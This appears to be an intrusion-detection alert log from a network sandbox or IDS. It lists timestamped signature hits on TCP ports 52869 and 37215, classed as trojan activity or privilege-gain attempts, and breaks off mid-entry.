                      Timestamp:07/20/24-23:01:43.013771
                      SID:2027339
                      Source Port:52668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.979559
                      SID:2025132
                      Source Port:36320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.769670
                      SID:2025132
                      Source Port:38540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2025132
                      Source Port:43904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:40688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220817
                      SID:2829579
                      Source Port:48860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2835222
                      Source Port:36002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.055714
                      SID:2835222
                      Source Port:56810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2027339
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.885298
                      SID:2027339
                      Source Port:49894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:40466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2835222
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.783977
                      SID:2027339
                      Source Port:40278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.354322
                      SID:2025132
                      Source Port:42528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.664606
                      SID:2829579
                      Source Port:36288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2027339
                      Source Port:49784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.858207
                      SID:2027339
                      Source Port:51006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249114
                      SID:2831300
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:45902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:47154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.503890
                      SID:2831300
                      Source Port:44896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.939279
                      SID:2027339
                      Source Port:49680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.047800
                      SID:2027339
                      Source Port:33026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:46.030378
                      SID:2027339
                      Source Port:41142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.300735
                      SID:2027339
                      Source Port:52236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:53580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.104072
                      SID:2831300
                      Source Port:45002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.203120
                      SID:2831300
                      Source Port:55958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:49900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2025132
                      Source Port:39112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2829579
                      Source Port:46836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:44842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2025132
                      Source Port:58180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2831300
                      Source Port:46546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.439009
                      SID:2027339
                      Source Port:56738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.882291
                      SID:2835222
                      Source Port:34656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.047922
                      SID:2027339
                      Source Port:60022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.576250
                      SID:2025132
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:41918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:16.745304
                      SID:2027339
                      Source Port:32840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.660847
                      SID:2027339
                      Source Port:40084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.169961
                      SID:2027339
                      Source Port:43394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:41030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.158709
                      SID:2831300
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.026968
                      SID:2831300
                      Source Port:36782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.444696
                      SID:2027339
                      Source Port:48644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.706162
                      SID:2025132
                      Source Port:49040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:44336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:37384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.913205
                      SID:2027339
                      Source Port:47070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.570605
                      SID:2027339
                      Source Port:45240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2835222
                      Source Port:54644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2027339
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:41800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.877606
                      SID:2027339
                      Source Port:34746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.427882
                      SID:2027339
                      Source Port:37342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2831300
                      Source Port:37212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.353592
                      SID:2025132
                      Source Port:49216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312736
                      SID:2831300
                      Source Port:49186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2025132
                      Source Port:40436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:54958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.319876
                      SID:2025132
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2831300
                      Source Port:52900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.790558
                      SID:2027339
                      Source Port:47720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2835222
                      Source Port:33310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2831300
                      Source Port:40878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.067695
                      SID:2027339
                      Source Port:38648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.113046
                      SID:2027339
                      Source Port:47232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.260371
                      SID:2025132
                      Source Port:47304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.290014
                      SID:2027339
                      Source Port:41124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.158919
                      SID:2025132
                      Source Port:52984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2027339
                      Source Port:37410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.141323
                      SID:2831300
                      Source Port:51316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.175676
                      SID:2027339
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2025132
                      Source Port:36982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.043842
                      SID:2835222
                      Source Port:51620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2829579
                      Source Port:52598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2835222
                      Source Port:44034
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.501090
                      SID:2027339
                      Source Port:35970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.650164
                      SID:2025132
                      Source Port:35728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2027339
                      Source Port:50536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.119973
                      SID:2835222
                      Source Port:53292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.880741
                      SID:2025132
                      Source Port:52238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:36904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.239928
                      SID:2025132
                      Source Port:46322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2835222
                      Source Port:33028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:38260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.630112
                      SID:2027339
                      Source Port:50674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486621
                      SID:2027339
                      Source Port:33156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.796749
                      SID:2027339
                      Source Port:37158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2027339
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:59564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2025132
                      Source Port:49224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.687128
                      SID:2831300
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:37006
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.069241
                      SID:2027339
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2027339
                      Source Port:40086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649697
                      SID:2829579
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.675827
                      SID:2025132
                      Source Port:40854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.610865
                      SID:2831300
                      Source Port:35466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.808098
                      SID:2025132
                      Source Port:34120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.873078
                      SID:2027339
                      Source Port:51952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2829579
                      Source Port:36910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2835222
                      Source Port:33172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2027339
                      Source Port:42714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.855231
                      SID:2025132
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:45666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.342792
                      SID:2027339
                      Source Port:58658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2027339
                      Source Port:48790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.261793
                      SID:2027339
                      Source Port:53988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2027339
                      Source Port:39266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2835222
                      Source Port:57606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2025132
                      Source Port:37094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.144931
                      SID:2025132
                      Source Port:51696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.970191
                      SID:2027339
                      Source Port:34126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.619597
                      SID:2027339
                      Source Port:34266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.537098
                      SID:2027339
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.139489
                      SID:2025132
                      Source Port:52264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:40494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.225146
                      SID:2027339
                      Source Port:36688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:60850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.631864
                      SID:2027339
                      Source Port:47372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:39010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.104533
                      SID:2831300
                      Source Port:51844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.944341
                      SID:2027339
                      Source Port:55426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2025132
                      Source Port:51252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220999
                      SID:2829579
                      Source Port:41094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:39662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:59270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469580
                      SID:2027339
                      Source Port:58956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2831300
                      Source Port:35552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2829579
                      Source Port:33084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.383466
                      SID:2027339
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.968363
                      SID:2027339
                      Source Port:37256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:50708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2027339
                      Source Port:40604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.977217
                      SID:2025132
                      Source Port:59800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.965131
                      SID:2831300
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2829579
                      Source Port:41810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.567823
                      SID:2831300
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.675171
                      SID:2027339
                      Source Port:53096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221790
                      SID:2829579
                      Source Port:56808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2025132
                      Source Port:44846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:50580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:39532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2025132
                      Source Port:52620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:34402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667513
                      SID:2027339
                      Source Port:37132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2829579
                      Source Port:50138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2835222
                      Source Port:47068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2835222
                      Source Port:38424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.856443
                      SID:2831300
                      Source Port:41204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2835222
                      Source Port:53604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.715800
                      SID:2025132
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.656173
                      SID:2025132
                      Source Port:47368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312234
                      SID:2831300
                      Source Port:47832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.042994
                      SID:2831300
                      Source Port:49708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.553792
                      SID:2831300
                      Source Port:35074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2829579
                      Source Port:35748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.415907
                      SID:2025132
                      Source Port:57270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2835222
                      Source Port:35780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.048479
                      SID:2027339
                      Source Port:56034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.588824
                      SID:2025132
                      Source Port:37778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2829579
                      Source Port:33262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2829579
                      Source Port:45492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2027339
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806235
                      SID:2831300
                      Source Port:40150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2831300
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2027339
                      Source Port:47200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.552669
                      SID:2025132
                      Source Port:54260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.751196
                      SID:2831300
                      Source Port:47178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.433265
                      SID:2025132
                      Source Port:55244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.958887
                      SID:2831300
                      Source Port:36624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:10.141900
                      SID:2831300
                      Source Port:48662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2025132
                      Source Port:37510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.458332
                      SID:2025132
                      Source Port:35490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.942554
                      SID:2027339
                      Source Port:38780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.653654
                      SID:2025132
                      Source Port:60364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2835222
                      Source Port:40206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.961047
